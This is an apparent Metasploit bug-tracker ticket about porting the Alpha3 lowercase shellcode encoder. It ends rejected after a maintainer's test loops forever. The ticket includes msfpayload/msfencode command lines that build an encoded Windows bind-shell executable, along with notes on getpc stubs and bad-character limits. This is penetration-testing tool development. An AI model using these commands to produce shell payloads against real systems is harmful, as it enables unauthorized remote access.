Feature #2480
Addition of the Alpha3 Encoder
| Status: | Rejected | Start date: | 09/01/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | - | % Done: | 0% |
|
| Category: | payloads | |||
| Target version: | Open Backlog | |||
| Resolution: | How To Use: | |||
| Release Note: |
Description
Since the Alpha3 Encoder apparently has a smaller decoder and the additional encoding options, it could be a good addition to MSF.
http://code.google.com/p/alpha3/
"The improvements over ALPHA2 include new encodings (x86 lowercase ascii and x64 mixedcase ascii) and smaller decoders for various other encodings."
History
Updated by Peter Van Eeckhoutte over 1 year ago
sent in first draft of alpha3 lowercase encoder.
if this one works, I'll try to port the other ones as well
Updated by James Lee over 1 year ago
Peter, can you attach that here as the output of "svn diff" from the metasploit base directory, please?
Updated by Peter Van Eeckhoutte over 1 year ago
- File corelanc0d3r_alpha3lower.tar.gz added
I have attached the most important (new) files :
lib/msf/core/encoder/alphalower.rb
lib/rex/encoder/alpha3.rb
lib/rex/encoder/alpha3/alpha_lower.rb
modules/encoders/x86/alpha_lower.rb
Please note that the code is not able to filter out bad chars, it does not accept null bytes in the source (raw) shellcode, and it requires a bufferregister. (ebx, ecx or edx)
(=> I believe those limitations are also present in skylined's original scripts - I just ported his routine)
Updated by Joshua J. Drake over 1 year ago
- Category set to payloads
Indeed it does. That's likely why no one has ported it.
I'm not so sure if this is the kind of encoder that is useful for us.
Updated by James Lee over 1 year ago
One possibility to make the most of these encoders would be to combine them with Alpha2 and only use them in cases where those conditions are met (no badchars, no nulls, have BufferRegister).
Updated by Peter Van Eeckhoutte over 1 year ago
- File alpha_lower.rb added
updated alpha_lower.rb (modules/encoders/x86/alpha_lower.rb)
- inline encoding if source contains null bytes
- creates a getpc stub if no bufferregister is given
Updated by Peter Van Eeckhoutte over 1 year ago
to do :
- try different getpc stubs until it either satisfies badchars, or raise exception (and mention use of BufferRegister)
- if an invalid bufferregister is specified, then either ignore it (and use getpc), or change it to ebx
- ...
Updated by Peter Van Eeckhoutte about 1 year ago
- File alpha_lower.rb added
updated alpha_lower.rb (modules/encoders/x86/alpha_lower.rb)
- added alternative getpc routine
- if invalid bufferregister is specified, getpc is used
Updated by Tod Beardsley 4 months ago
- Status changed from New to HavePatch
- Target version set to Metasploit 4.3.0
Updated by Tod Beardsley 3 months ago
- File alpha_lower.diff added
- Target version changed from Metasploit 4.3.0 to Open Backlog
- 10 set to 0
I apologize for the long lag on this. I've fixed a couple typos in the submitted code, and created a diff patch version. However, in some simple testing, the encoder seems to loop forever.
If I'm doing it wrong, please let me know with some testing guidance and reopen this ticket.
Here's my quick test, which passes with alpha_upper :
$ ./msfpayload windows/shell_bind_tcp LPORT=13222 X | ./msfencode -e "x86/alpha_upper" > /tmp/met2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
Length: 341
Options: {"LPORT"=>"13222"}
[*] x86/alpha_upper succeeded with size 147672 (iteration=1)
$ ./msfpayload windows/shell_bind_tcp LPORT=13333 X | ./msfencode -e "x86/alpha_lower" > /tmp/met3.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
Length: 341
Options: {"LPORT"=>"13333"} # Wait here for many minutes
^C/home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:310:in `do_encode': Interrupt
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder/xor_additive_feedback.rb:59:in `find_key'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:428:in `obtain_key'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:255:in `encode'
from /home/todb/proj/msf3/trunk/lib/msf/util/exe.rb:1135:in `block in encode_stub'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:242:in `call'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:242:in `block in each_module_list'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:215:in `each'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:215:in `each_module_list'
from /home/todb/proj/msf3/trunk/lib/msf/core/module_manager.rb:145:in `each_module_ranked'
from /home/todb/proj/msf3/trunk/lib/msf/util/exe.rb:1132:in `encode_stub'
from (eval):143:in `encode_block'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:316:in `do_encode'
from /home/todb/proj/msf3/trunk/lib/msf/core/encoder.rb:270:in `encode'
from ./msfencode:244:in `block (2 levels) in <main>'
from ./msfencode:241:in `upto'
from ./msfencode:241:in `block in <main>'
from ./msfencode:231:in `each'
from ./msfencode:231:in `<main>'
Updated by Tod Beardsley 3 months ago
- Status changed from HavePatch to Rejected